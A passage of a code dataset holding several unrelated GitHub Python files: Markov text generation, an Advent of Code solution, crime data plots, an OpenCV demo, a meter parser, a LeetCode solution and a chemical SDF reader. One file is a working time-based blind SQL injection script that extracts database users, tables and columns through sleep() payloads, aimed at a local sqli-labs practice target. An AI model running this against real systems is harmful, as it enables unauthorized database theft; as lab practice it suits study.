Here's an updated version of the code that incorporates chaos theory and allows optimization of the lambda parameter:\r\n\r\n#```\r\nimport re\r\nimport random\r\nimport numpy as np\r\nfrom scipy.optimize import minimize_scalar\r\n\r\n\r\ndef generate_text(corpus, n, lambd):\r\n words = re.findall(r'\\w+', corpus.lower())\r\n markov_dict = {}\r\n for i in range(len(words) - n):\r\n key = tuple(words[i:i+n])\r\n if key in markov_dict:\r\n markov_dict[key].append(words[i+n])\r\n else:\r\n markov_dict[key] = [words[i+n]]\r\n seed = random.randint(0, len(words) - n)\r\n seed_words = words[seed:seed+n]\r\n result = \" \".join(seed_words)\r\n for i in range(100):\r\n key = tuple(seed_words)\r\n if key in markov_dict:\r\n possible_words = markov_dict[key]\r\n weights = np.array([markov_dict[(key)].count(w) for w in possible_words])\r\n probs = weights / weights.sum()\r\n chaos = np.random.rand()\r\n if chaos < lambd:\r\n next_word = random.choice(possible_words)\r\n else:\r\n next_word = np.random.choice(possible_words, p=probs)\r\n result += \" \" + next_word\r\n seed_words = seed_words[1:] + [next_word]\r\n else:\r\n break\r\n return result.capitalize() + \".\"\r\n\r\n\r\ndef objective(lambd, corpus, n):\r\n text = generate_text(corpus, n, lambd)\r\n score = len(set(text.split())) / len(text.split())\r\n return -score\r\n\r\n\r\ncorpus = \"The quick brown fox jumps over the lazy dog.\"\r\nn = 2\r\nres = minimize_scalar(objective, args=(corpus, n))\r\nlambd = res.x\r\nprint(\"Optimal lambda parameter:\", lambd)\r\nprint(\"Generated text:\")\r\nprint(generate_text(corpus, n, lambd))\r\n#```\r\n\r\n#In this updated code, I've added a new parameter `lambd` which controls the chaos factor in the Markov Chain model. The `generate_text` function now calculates the probability distribution of the possible next words based on their frequency in the Markov Chain, and then uses the chaos factor to randomly choose between the most likely word and a randomly selected word from the distribution.\r\n\r\n#The `objective` function is a new helper function that takes the `lambd` parameter and the input text, and generates a text using the `generate_text` function. It then calculates a score based on the ratio of unique words to total words in the generated text, and returns the negative of that score (since we want to maximize the score).\r\n\r\n#The `minimize_scalar` function from the `scipy.optimize` library is then used to find the optimal value of `lambd` that maximizes the score returned by the `objective` function.\r\n\r\n#Finally, the optimal value of `lambd` is printed along with the generated text using the `generate_text` function with the optimal value of `lambd`.\r\n\r\n#This updated code allows the user to optimize the chaos factor to balance between generating text that is too repetitive or too random. 
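\r\n\r\n# One possible refinement (an assumption, not in the original script): lambd acts\r\n# as a probability, so the search could be constrained to [0, 1] with the bounded\r\n# method of minimize_scalar:\r\n#\r\n# res = minimize_scalar(objective, args=(corpus, n), method='bounded', bounds=(0, 1))\r\n# lambd = res.x\r\n\r\n#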
The optimization process can take some time depending on the size of the input text and the value of `n`, but it can significantly improve the quality of the generated text.\r\n","repo_name":"Sarmentor/CAOS-EXPERIMENTS","sub_path":"GENERATION MARKOV MODEL/chatGPT-GEN-MODEL-MARKOV-CHAOS.py","file_name":"chatGPT-GEN-MODEL-MARKOV-CHAOS.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9644617652","text":"from functools import lru_cache\n\n\ndef load_data(filename):\n with open(filename, 'r') as f:\n for line in f:\n yield line.strip()\n\n\nSNAFU = {'0': 0, '1': 1, '2': 2, '=': -2, '-': -1}\nSNAFU_KEYS = ['0', '1', '2', '=', '-']\n\n\n@lru_cache\ndef radix_5_to_10(snafu):\n result = 0\n for c in snafu:\n result = result * 5 + SNAFU[c]\n return int(result)\n\n\n@lru_cache\ndef radix_10_to_5(n):\n if n == 0:\n return '0'\n result = ''\n while n > 0:\n n, r = divmod(n, 5)\n result = SNAFU_KEYS[r] + result\n if r > 2:\n # if snafu == '-' or '=' then overflow\n n = n + 1\n return result\n\n\nif __name__ == '__main__':\n short = False\n\n if short:\n filename = 'input.short.txt'\n else:\n filename = 'input.txt'\n\n part_1_sum = 0\n for line in load_data(filename):\n part_1_sum += radix_5_to_10(line)\n\n # part 1\n print('radix 10 sum:', part_1_sum)\n part_1 = radix_10_to_5(part_1_sum)\n print('SNAFU:', part_1) # 2=020-===0-1===2=020\n","repo_name":"kobzarvs/adventofcode","sub_path":"src/2022/day25/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22777490863","text":"# Import necessary libraries/modules\nimport os # Import the 'os' module for working with file paths and directories\nimport pandas as pd # Import the 'pandas' library for data manipulation\nimport matplotlib.pyplot as plt # Import 'matplotlib.pyplot' for data visualization\nimport seaborn as sns # Import 'seaborn' for enhanced data visualization\nimport folium as fl # Import 'folium' for creating interactive maps\n\n# 1. Load Data\ncsv_file_path = \"/Users/muhammadfauzy/Documents/1. FOLDER KERJAAN/1. Data Analyst /2. DataSet/DataSet - CRIME IN LA PROJECT/crime_in_la.csv\"\ndelimiter = ',' # Define the delimiter used in the CSV file\ndata = pd.read_csv(csv_file_path, sep=delimiter) # Read the CSV data into a Pandas DataFrame\n\n# 2. Display After Load\nprint(\"First 5 rows of the DataFrame:\")\nprint(data.head(5)) # Display the first 5 rows of the loaded DataFrame\n\n# Calculate summary statistics\nsummary_stats = data.describe(percentiles=[0.25, 0.5, 0.75])\nprint(summary_stats) # Display summary statistics of the data\n\n# Identify missing values\nmissing_values = data.isna().sum()\nprint(\"Missing Values:\")\nprint(missing_values) # Display the count of missing values in each column\n\n# Check data types\ndata_types = data.dtypes\nprint(\"Data Types:\")\nprint(data_types) # Display data types of columns\n\n# 3. Remove Missing rows\ndata_cleaned = data.dropna(subset=[\"Premis Desc\"]) # Remove rows with missing values in the \"Premis Desc\" column\nprint(\"First 5 rows of the cleaned DataFrame:\")\nprint(data_cleaned.head(5)) # Display the first 5 rows of the cleaned DataFrame\n\n# Check missing values in the cleaned data\nmissing_values_cleaned = data_cleaned.isna().sum()\nprint(\"Missing Values in Cleaned Data:\")\nprint(missing_values_cleaned) # Display missing values in the cleaned data\n\n# 4. 
Data Visualization\n# Create a histogram of victim ages\nplt.hist(data['Vict Age'], bins=20, edgecolor='k')\nplt.xlabel('Age')\nplt.ylabel('Frequency')\nplt.title('Distribution of Victim Ages')\nplt.show()\n\n# Create a countplot of crime counts by area name\nplt.figure(figsize=(12, 6))\nsns.countplot(x='AREA NAME', data=data, order=data['AREA NAME'].value_counts().index)\nplt.xticks(rotation=90)\nplt.xlabel('Area Name')\nplt.ylabel('Crime Count')\nplt.title('Crime Counts by Area')\nplt.show()\n\n# Create a scatter plot of crime locations\nplt.figure(figsize=(10, 6))\nplt.scatter(data['LON'], data['LAT'], alpha=0.5, c='b')\nplt.xlabel('Longitude')\nplt.ylabel('Latitude')\nplt.title('Crime Locations in LA')\nplt.show()\n\n# Create a boxplot of crime code distribution by area name\nplt.figure(figsize=(12, 6))\nsns.boxplot(x='AREA NAME', y='Crm Cd', data=data)\nplt.xticks(rotation=90)\nplt.xlabel('Area Name')\nplt.ylabel('Crime Code')\nplt.title('Crime Code Distribution by Area')\nplt.show()\n\n# Continue with additional code...\n","repo_name":"Untamed98x/Unveiling-Crime-Trends-in-Lost-Angeles","sub_path":"LAProject.py","file_name":"LAProject.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"29970117775","text":"# /usr/bin/env python3.6\n# coding=utf8\n\nimport sys\nimport time\nimport math\nimport logging\nimport requests\n\n\ndef get(url):\n\t\"\"\"\n\tSend a GET request and return the number of seconds from sending the request\n\tto receiving the response.\n\t\"\"\"\n\tlogging.info('[*] GET {}'.format(url))\n\tstart_time = time.time()\n\tr = requests.get(url=url, timeout=TIME_OUT)\n\tif r.status_code != 200:\n\t\tlogging.warning('The url {} returns {}'.format(url, r.status_code))\n\tduration = time.time() - start_time\n\treturn duration\n\n\ndef is_right(response_time):\n\t\"\"\"\n\tJudge from the HTTP response time whether the injected SQL actually executed.\n\t\"\"\"\n\treturn (response_time - base_time) > 0.8*DELAY\n\n\ndef is_vulnerability(target):\n\t\"\"\"\n\tDetermine whether the target has an injection vulnerability.\n\t\"\"\"\n\tglobal base_time\n\tbase_time = get(target.format(VALUE))\n\tcrosses = ['\"', '\")', '\"))', '\\'', '\\')', '\\'))']\n\tpayload = ' union select 1,2,sleep({}) '.format(DELAY)\n\tfor cross in crosses:\n\t\tif is_right(get(target.format(VALUE + cross + payload + COMMENT))):\n\t\t\tlogging.info('[+] SQL injection vulnerability exists, cross boundary symbol is `{}`.'.format(cross))\n\t\t\tbreak\n\telse:\n\t\tcross = None\n\t\tlogging.fatal('[-] No SQL injection vulnerability exists.')\n\treturn cross\n\n\ndef get_data_by_time(target, cross, select):\n\t\"\"\"\n\tExtract the result of a query, one character at a time, from response timing.\n\t\"\"\"\n\treal_values = str()\n\tunion_select = ' union select 1,2, if(ascii(substr(({}), {{}}, 1)) <= {{}}, sleep({}), 1)'.format(select, DELAY)\n\n\tn = 1\n\twhile True:\n\t\tmax_value = 127\n\t\tmin_value = 0\n\n\t\t# ascii() of an empty substring is 0, so a delay on the <= 0 probe (or none\n\t\t# on the <= 127 probe) means there are no more characters to read.\n\t\tif is_right(get(target.format(cross + union_select.format(n, min_value) + COMMENT))):\n\t\t\tbreak\n\t\tif not is_right(get(target.format(cross + union_select.format(n, max_value) + COMMENT))):\n\t\t\tbreak\n\n\t\t# Binary search over the ASCII range for the n-th character.\n\t\twhile min_value < max_value-1:\n\t\t\tmiddle_value = math.ceil((max_value+min_value)/2)\n\n\t\t\tif is_right(get(target.format(cross + union_select.format(n, middle_value) + COMMENT))):\n\t\t\t\tmax_value = middle_value\n\t\t\telse:\n\t\t\t\tmin_value = middle_value\n\n\t\tif is_right(get(target.format(cross + union_select.format(n, max_value) + COMMENT))):\n\t\t\treal_value = max_value\n\t\telse:\n\t\t\treal_value = min_value\n\n\t\treal_values += chr(real_value)\n\t\tn += 1\n\n\treturn real_values\n
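\n# Worked example (illustrative, with assumed values): probing the first character\n# of user() with DELAY=0.1 and cross='\"' appends to the id parameter:\n# 1\" union select 1,2, if(ascii(substr((select user()), 1, 1)) <= 64, sleep(0.1), 1) +--+\n# A delayed response means the character code is <= 64 and the search halves\n# downward; about 7 requests resolve each character in the 0-127 range.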
\n\ndef main(target):\n\t\"\"\"\n\tRun a time-based blind SQL injection against the target.\n\t\"\"\"\n\t# Check whether an injection vulnerability exists\n\tcross = is_vulnerability(target)\n\tif cross is None:\n\t\tsys.exit(-1)\n\n\n\t# Get the user name\n\tselect = 'select user()'\n\tuser = get_data_by_time(target, cross, select)\n\tprint('{}: {}'.format(select, user))\n\n\t# Get the database name\n\tselect = 'select database()'\n\tdatabase = get_data_by_time(target, cross, select)\n\tprint('{}: {}'.format(select, database))\n\n\t# Get the table names\n\ttables = list()\n\tn = 0\n\twhile True:\n\t\tselect = 'select table_name from information_schema.tables where table_schema = \"{}\" limit {}, 1'.format(database, n)\n\t\tdata = get_data_by_time(target, cross, select)\n\t\tif data != '':\n\t\t\ttables.append(data)\n\t\t\tn += 1\n\t\telse:\n\t\t\tbreak\n\tprint('There are tables {} in database {}'.format(', '.join(tables), database))\n\n\t# Get the column names\n\tfor table in tables:\n\t\tcolumns = list()\n\t\tn = 0\n\t\twhile True:\n\t\t\tselect = 'select column_name from information_schema.columns where table_schema = \"{}\" and table_name = \"{}\" limit {}, 1'.format(database, table, n)\n\t\t\tdata = get_data_by_time(target, cross, select)\n\t\t\tif data != '':\n\t\t\t\tcolumns.append(data)\n\t\t\t\tn += 1\n\t\t\telse:\n\t\t\t\tbreak\n\t\tprint('There are columns {} in table {}'.format(', '.join(columns), table))\n\n\nif __name__ == '__main__':\n\n\tTARGET = 'http://127.0.0.1/sqlilabs/Less-10/?id={}' # URL with the injection point; the parameter value is replaced by {}\n\tVALUE = '1' # original value of the injected parameter\n\tCOMMENT = '+--+' # SQL comment format\n\tDELAY = 0.1 # sleep time used when testing for the vulnerability; can be smaller on a fast connection\n\tTIME_OUT = 60 # request timeout in seconds\n\tLOGGING_LEVEL = logging.WARN # log level\n\n\tlogging.basicConfig(level=LOGGING_LEVEL)\n\tlogging.debug('[*] The target is {}'.format(TARGET.format(VALUE)))\n\tmain(TARGET)\n","repo_name":"Werneror/Practise","sub_path":"Python/sqli_time_blind.py","file_name":"sqli_time_blind.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"75"}
{"seq_id":"24499179561","text":"# Program to Print Image Matrix Using OpenCV\r\n\r\nimport cv2\r\n\r\nimgpath = \"C:\\\\Users\\\\hp\\\\Desktop\\\\Python-OpenCV\\\\Dataset\\\\Lena.jpg\"\r\nimg = cv2.imread(imgpath)\r\n\r\nprint(img) # Print Image\r\nprint(img.shape) # Print Shape\r\nprint(img.ndim) # Print Dimension\r\nprint(type(img)) # Print Type of Image\r\n\r\ncv2.imshow('Lena',img)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"javed2214/Python-OpenCV","sub_path":"OpenCV-3.py","file_name":"OpenCV-3.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"17728142902","text":"from mongo import get_database\nimport csv\nimport json\nimport values as va\n\ndef update_engelman_parser(csvFilePath):\n meters_db = get_database()\n coll = meters_db[va.coll_name]\n f = open(csvFilePath,'r')\n arr_meter = csv.reader(f, delimiter = ';')\n for number in arr_meter:\n if number[0] != '«File completely written»':\n if number[2] == 'ID':\n continue\n else:\n if coll.find_one({'_id':number[2]}):\n meter = coll.find_one({'_id':number[2]})['Parser'][0]\n coll.update_one({'_id':number[2]},{'$set':{'Meter time':number[meter['Date']]}})\n if coll.find_one({'_id':number[2]})['Meter type'] == 'Heat':\n coll.update_one({'_id':number[2]},{'$set':{'Heat':number[meter['Heat']]}})\n else:\n if coll.find_one({'_id':number[2]})['Meter type'] == 'Water':\n coll.update_one({'_id':number[2]},{'$set':{'m3':number[meter['m3']]}})\n 
coll.update_one({'_id':number[2]},{'$set':{'Meter number':number[meter['Meter number']]}})\n coll.update_one({'_id':number[2]},{'$set':{'Status':number[meter['Status']]}})\n else:\n print('no meter')\n#update_engelman_parser('../some_file/engel.csv')\n\n#engelman_convert_parser('../some_file/engel.csv', '../some_json/engel.json')\n","repo_name":"Usychenko/ukrOblik_server","sub_path":"mongo/engelman_parser_insert.py","file_name":"engelman_parser_insert.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30532255145","text":"# needed for python unit testings\n# https://docs.python.org/3/library/unittest.html\nimport unittest\n\n# required for type hinting\n# https://mypy.readthedocs.io/en/stable/cheat_sheet_py3.html\nfrom typing import List, Optional\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n '''\n Find the total tilt of the binary tree\n\n Tilt is the abs(sum of left subtree - sum of right subtree)\n '''\n def findTilt(self, root: Optional[TreeNode]) -> int:\n if root is None:\n return 0\n return self.helper(root)[1]\n\n # returns a tuple of (sum of subtree, sum tilt of subtree)\n def helper(self, root: Optional[TreeNode]) -> (int, int):\n if root is None:\n return (0,0)\n left = self.helper(root.left)\n right = self.helper(root.right)\n tilt = abs(left[0] - right[0])\n return (root.val + left[0] + right[0], tilt + left[1] + right[1])\n\nclass UnitTesting(unittest.TestCase):\n # actual test to run on Solution\n def test_one(self):\n s = Solution()\n t = TreeNode(1, TreeNode(2), TreeNode(3))\n self.assertEqual(s.findTilt(t), 1)\n\n def test_two(self):\n s = Solution()\n t = TreeNode(4, TreeNode(2, TreeNode(3), TreeNode(5)), TreeNode(9, None, TreeNode(7)))\n self.assertEqual(s.findTilt(t), 15)\n\n def test_three(self):\n s = Solution()\n t = TreeNode(21, TreeNode(7, TreeNode(1, TreeNode(3), TreeNode(3)), TreeNode(1)), TreeNode(14, TreeNode(2), TreeNode(2)))\n self.assertEqual(s.findTilt(t), 9)\n\nif __name__ == '__main__':\n unittest.main(verbosity=2)","repo_name":"olsenw/LeetCodeExercises","sub_path":"Python3/binary_tree_tilt.py","file_name":"binary_tree_tilt.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70566598964","text":"import requests\nimport json\n\n# Define the input data as a dictionary\ninput_data = {\n \"Location\": \"Lakshmipur\",\n \"Crop_Name\": \"Soyabean\",\n \"Soil_Type\": \"Clayey\",\n \"Yield\": 8\n}\n\n# Convert the input data to JSON\ninput_json = json.dumps(input_data)\n\n# Make a POST request to the Flask API\nurl = \"http://127.0.0.1:8000/api/predict/\" # Local URL\nheaders = {\"Content-Type\": \"application/json\"}\nresponse = requests.post(url, data=input_json, headers=headers)\n\n# Check the response\nif response.status_code == 200:\n result = response.json()\n print(\"Fertilizer Recommendations:\")\n print(json.dumps(result, indent=2))\nelse:\n print(f\"Error: {response.status_code}\")","repo_name":"DukulH/Agrigate_Ferti-Doc","sub_path":"Ferti_Doc_Backend/api/send_request.py","file_name":"send_request.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"12899956052","text":"import os\nimport glob\nimport pandas 
as pd\nfrom torch.utils.data import Dataset\n\n\nclass RandomAccessCsvsDataset(Dataset):\n def __init__(self, folder_path, file_pattern, x_columns, y_columns, transform=None):\n self.folder_path = folder_path\n self.file_pattern = file_pattern\n self.x_columns = x_columns\n self.y_columns = y_columns\n self.transform = transform\n self.file_list = glob.glob(os.path.join(folder_path, file_pattern))\n self.line_counts = self.get_line_counts()\n\n def get_line_counts(self):\n line_counts = []\n total_lines = 0\n for file in self.file_list:\n with open(file, 'r') as f:\n lines = sum(1 for line in f) - 1 # Subtract 1 for header\n line_counts.append(lines)\n total_lines += lines\n return line_counts\n\n def __len__(self):\n return sum(self.line_counts)\n\n def __getitem__(self, idx):\n # Find the file containing the idx-th data\n file_idx = 0\n while idx >= self.line_counts[file_idx]:\n idx -= self.line_counts[file_idx]\n file_idx += 1\n\n # Read the corresponding line from the file\n file_path = self.file_list[file_idx]\n df = pd.read_csv(file_path, skiprows=idx + 1, nrows=1, header=None)\n\n # Extract x and y variables\n x_data = df.loc[:, self.x_columns].values\n y_data = df.loc[:, self.y_columns].values\n\n # Apply the transform if provided\n if self.transform:\n x_data, y_data = self.transform(x_data, y_data)\n\n return x_data, y_data\n\n\n","repo_name":"microprediction/simplecsvdataset","sub_path":"simplecsvdataset/randomaccess.py","file_name":"randomaccess.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21273950263","text":"\"\"\"\nImplementation of the reader for SDF files using OpenBabel\n\"\"\"\n\nimport bz2\nimport gzip\nfrom pathlib import Path\nimport shutil\nimport string\nimport subprocess\nimport time\n\nfrom openbabel import openbabel\n\nfrom ..registries import register_format_checker\nfrom ..registries import register_reader\nfrom ..registries import register_writer\nfrom ..registries import set_format_metadata\nfrom ...utils import parse_indices\n\nif \"OpenBabel_version\" not in globals():\n OpenBabel_version = None\n\nset_format_metadata(\n [\".sd\", \".sdf\"],\n single_structure=False,\n dimensionality=0,\n coordinate_dimensionality=3,\n property_data=True,\n bonds=True,\n is_complete=False,\n add_hydrogens=True,\n)\n\n\n@register_format_checker(\".sdf\")\ndef check_format(path):\n \"\"\"Check if a file is an MDL SDFile.\n\n Check if the last line is \"$$$$\", which is the terminator for a molecule in SDFiles.\n\n Parameters\n ----------\n path : str or Path\n \"\"\"\n last = \"\"\n with open(path, \"r\") as fd:\n for line in fd:\n line = line.strip()\n if line != \"\":\n last = line\n\n return last == \"$$$$\"\n\n\n@register_reader(\".sd -- MDL structure-data file\")\n@register_reader(\".sdf -- MDL structure-data file\")\ndef load_sdf(\n path,\n configuration,\n extension=\".sdf\",\n add_hydrogens=True,\n system_db=None,\n system=None,\n indices=\"1-end\",\n subsequent_as_configurations=False,\n system_name=\"Canonical SMILES\",\n configuration_name=\"sequential\",\n printer=None,\n references=None,\n bibliography=None,\n **kwargs,\n):\n \"\"\"Read an MDL structure-data (SDF) file.\n\n See https://en.wikipedia.org/wiki/Chemical_table_file for a description of the\n format. 
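\n\n A usage sketch (an illustration, not from the original file; names are\n placeholders):\n\n configurations = load_sdf(\"mols.sdf\", configuration, system_db=db, indices=\"1-10\")\n\n reads the first ten records into new systems and returns the created\n configurations.\n\n 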
This function is using Open Babel to handle the file, so trusts that Open\n Babel knows what it is doing.\n\n Parameters\n ----------\n file_name : str or Path\n The path to the file, as either a string or Path.\n\n configuration : molsystem.Configuration\n The configuration to put the imported structure into.\n\n extension : str, optional, default: None\n The extension, including initial dot, defining the format.\n\n add_hydrogens : bool = True\n Whether to add any missing hydrogen atoms.\n\n system_db : System_DB = None\n The system database, used if multiple structures in the file.\n\n system : System = None\n The system to use if adding subsequent structures as configurations.\n\n indices : str = \"1-end\"\n The generalized indices (slices, SMARTS, etc.) to select structures\n from a file containing multiple structures.\n\n subsequent_as_configurations : bool = False\n Normally and subsequent structures are loaded into new systems; however,\n if this option is True, they will be added as configurations.\n\n system_name : str = \"from file\"\n The name for systems. Can be directives like \"SMILES\" or\n \"Canonical SMILES\". If None, no name is given.\n\n configuration_name : str = \"sequential\"\n The name for configurations. Can be directives like \"SMILES\" or\n \"Canonical SMILES\". If None, no name is given.\n\n printer : Logger or Printer\n A function that prints to the appropriate place, used for progress.\n\n references : ReferenceHandler = None\n The reference handler object or None\n\n bibliography : dict\n The bibliography as a dictionary.\n\n Returns\n -------\n [Configuration]\n The list of configurations created.\n \"\"\"\n global OpenBabel_version\n\n if isinstance(path, str):\n path = Path(path)\n\n path = path.expanduser().resolve()\n\n # Get the information for progress output, if requested.\n n_records = 0\n with (\n gzip.open(path, mode=\"rt\")\n if path.suffix == \".gz\"\n else bz2.open(path, mode=\"rt\")\n if path.suffix == \".bz2\"\n else open(path, \"r\")\n ) as fd:\n for line in fd:\n if line[0:4] == \"$$$$\":\n n_records += 1\n if printer is not None:\n printer(\"\")\n printer(f\" The SDF file contains {n_records} structures.\")\n last_percent = 0\n t0 = time.time()\n last_t = t0\n\n # Get the indices to pick\n indices = parse_indices(indices, n_records)\n n_structures = len(indices)\n if n_structures == 0:\n return\n stop = indices[-1]\n\n obConversion = openbabel.OBConversion()\n obConversion.SetInAndOutFormats(\"sdf\", \"smi\")\n\n configurations = []\n record_no = 0\n structure_no = 0\n n_errors = 0\n obMol = openbabel.OBMol()\n text = \"\"\n with (\n gzip.open(path, mode=\"rt\")\n if path.suffix == \".gz\"\n else bz2.open(path, mode=\"rt\")\n if path.suffix == \".bz2\"\n else open(path, \"r\")\n ) as fd:\n for line in fd:\n text += line\n\n if line[0:4] != \"$$$$\":\n continue\n\n record_no += 1\n if record_no > stop:\n text = \"\"\n break\n if record_no not in indices:\n text = \"\"\n continue\n\n obConversion.ReadString(obMol, text)\n\n # See if the system and configuration names are encoded in the title\n title = obMol.GetTitle()\n sysname = title\n confname = title\n have_sysname = False\n if \"SEAMM=\" in title:\n for tmp in title.split(\"|\"):\n if \"SEAMM=\" in tmp and \"/\" in tmp:\n sysname, confname = tmp.split(\"=\", 1)[1].split(\"/\", 1)\n sysname = sysname.strip()\n confname = confname.strip()\n have_sysname = True\n\n if add_hydrogens:\n obMol.AddHydrogens()\n\n structure_no += 1\n if structure_no > 1:\n if subsequent_as_configurations:\n 
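# Records after the first either join the current system as new configurations\n # (this branch) or start a brand-new system below.\n 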
configuration = system.create_configuration()\n else:\n if have_sysname and \"from file\" in system_name.lower():\n # Reuse the system if it exists\n if system_db.system_exists(sysname):\n system = system_db.get_system(sysname)\n else:\n system = system_db.create_system()\n else:\n system = system_db.create_system()\n configuration = system.create_configuration()\n\n try:\n configuration.from_OBMol(obMol)\n except Exception as e:\n n_errors += 1\n printer(\"\")\n printer(f\" Error handling entry {record_no} in the SDF file:\")\n printer(\" \" + str(e))\n printer(\" Text of the entry is\")\n printer(\" \" + 60 * \"-\")\n for line in text.splitlines():\n printer(\" \" + line)\n printer(\" \" + 60 * \"-\")\n printer(\"\")\n text = \"\"\n continue\n\n configurations.append(configuration)\n text = \"\"\n\n # Set the system name\n if system_name is not None and system_name != \"\":\n lower_name = system_name.lower()\n if \"from file\" in lower_name:\n system.name = sysname\n elif \"canonical smiles\" in lower_name:\n system.name = configuration.canonical_smiles\n elif \"smiles\" in lower_name:\n system.name = configuration.smiles\n else:\n system.name = system_name\n\n # And the configuration name\n if configuration_name is not None and configuration_name != \"\":\n lower_name = configuration_name.lower()\n if \"from file\" in lower_name:\n configuration.name = confname\n elif \"canonical smiles\" in lower_name:\n configuration.name = configuration.canonical_smiles\n elif \"smiles\" in lower_name:\n configuration.name = configuration.smiles\n elif lower_name == \"sequential\":\n configuration.name = str(record_no)\n else:\n configuration.name = configuration_name\n\n if printer:\n percent = int(100 * structure_no / n_structures)\n if percent > last_percent:\n t1 = time.time()\n if t1 - last_t >= 60:\n t = int(t1 - t0)\n rate = structure_no / (t1 - t0)\n t_left = int((n_structures - structure_no) / rate)\n printer(\n f\"\\t{structure_no:6} ({percent}%) structures read in {t} \"\n f\"seconds. 
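A tiny standalone check (not from the source) of the "SEAMM=system/configuration" title convention parsed in the loop above; the molecule and names are made up:

title = "ethanol |SEAMM=alcohols/conformer-1|"
sysname = confname = title
if "SEAMM=" in title:
    for tmp in title.split("|"):
        if "SEAMM=" in tmp and "/" in tmp:
            sysname, confname = tmp.split("=", 1)[1].split("/", 1)
print(sysname.strip(), confname.strip())  # alcohols conformer-1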
About {t_left} seconds remaining.\"\n )\n last_t = t1\n last_percent = percent\n\n if printer:\n t1 = time.time()\n rate = structure_no / (t1 - t0)\n printer(\n f\" Read {structure_no - n_errors} structures in {t1 - t0:.1f} \"\n f\"seconds = {rate:.2f} per second\"\n )\n if n_errors > 0:\n printer(f\" {n_errors} structures could not be read due to errors.\")\n\n if references:\n # Add the citations for Open Babel\n references.cite(\n raw=bibliography[\"openbabel\"],\n alias=\"openbabel_jcinf\",\n module=\"read_structure_step\",\n level=1,\n note=\"The principle Open Babel citation.\",\n )\n\n # See if we can get the version of obabel\n if OpenBabel_version is None:\n path = shutil.which(\"obabel\")\n if path is not None:\n path = Path(path).expanduser().resolve()\n try:\n result = subprocess.run(\n [str(path), \"--version\"],\n stdin=subprocess.DEVNULL,\n capture_output=True,\n text=True,\n )\n except Exception:\n OpenBabel_version = \"unknown\"\n else:\n OpenBabel_version = \"unknown\"\n lines = result.stdout.splitlines()\n for line in lines:\n line = line.strip()\n tmp = line.split()\n if len(tmp) == 9 and tmp[0] == \"Open\":\n OpenBabel_version = {\n \"version\": tmp[2],\n \"month\": tmp[4],\n \"year\": tmp[6],\n }\n break\n\n if isinstance(OpenBabel_version, dict):\n try:\n template = string.Template(bibliography[\"obabel\"])\n\n citation = template.substitute(\n month=OpenBabel_version[\"month\"],\n version=OpenBabel_version[\"version\"],\n year=OpenBabel_version[\"year\"],\n )\n\n references.cite(\n raw=citation,\n alias=\"obabel-exe\",\n module=\"read_structure_step\",\n level=1,\n note=\"The principle citation for the Open Babel executables.\",\n )\n except Exception:\n pass\n\n return configurations\n\n\n@register_writer(\".sd -- MDL structure-data file\")\n@register_writer(\".sdf -- MDL structure-data file\")\ndef write_sdf(\n path,\n configurations,\n extension=None,\n remove_hydrogens=\"no\",\n printer=None,\n references=None,\n bibliography=None,\n):\n \"\"\"Write an MDL structure-data (SDF) file.\n\n See https://en.wikipedia.org/wiki/Chemical_table_file for a description of the\n format. 
This function is using Open Babel to handle the file, so trusts that Open\n    Babel knows what it is doing.\n\n    Parameters\n    ----------\n    path : str\n        Name of the file\n\n    configurations : [Configuration]\n        The SEAMM configurations to write\n\n    extension : str, optional, default: None\n        The extension, including initial dot, defining the format.\n\n    remove_hydrogens : str = \"no\"\n        Whether to remove hydrogen atoms before writing the structure to file.\n\n    printer : Logger or Printer\n        A function that prints to the appropriate place, used for progress.\n\n    references : ReferenceHandler = None\n        The reference handler object or None\n\n    bibliography : dict\n        The bibliography as a dictionary.\n    \"\"\"\n    global OpenBabel_version\n\n    if isinstance(path, str):\n        path = Path(path)\n\n    path = path.expanduser().resolve()\n\n    obConversion = openbabel.OBConversion()\n    obConversion.SetInAndOutFormats(\"smi\", \"sdf\")\n\n    n_structures = len(configurations)\n    last_percent = 0\n    last_t = t0 = time.time()\n    structure_no = 1\n    compress = path.suffix == \".gz\"\n    with gzip.open(path, mode=\"wb\") if compress else open(path, \"w\") as fd:\n        for configuration in configurations:\n            obMol = configuration.to_OBMol(properties=\"all\")\n\n            system = configuration.system\n            title = f\"SEAMM={system.name}/{configuration.name}\"\n            obMol.SetTitle(title)\n\n            if remove_hydrogens == \"nonpolar\":\n                obMol.DeleteNonPolarHydrogens()\n            elif remove_hydrogens == \"all\":\n                obMol.DeleteHydrogens()\n\n            text = obConversion.WriteString(obMol)\n\n            # Check that the conversion succeeded\n            if text is None or text == \"\":\n                raise RuntimeError(\"Error writing file\")\n\n            if compress:\n                fd.write(bytes(text, \"utf-8\"))\n            else:\n                fd.write(text)\n\n            structure_no += 1\n            if printer:\n                percent = int(100 * structure_no / n_structures)\n                if percent > last_percent:\n                    t1 = time.time()\n                    if t1 - last_t >= 60:\n                        t = int(t1 - t0)\n                        rate = structure_no / (t1 - t0)\n                        t_left = int((n_structures - structure_no) / rate)\n                        printer(\n                            f\"\\t{structure_no:6} ({percent}%) structures written in {t} \"\n                            f\"seconds. 
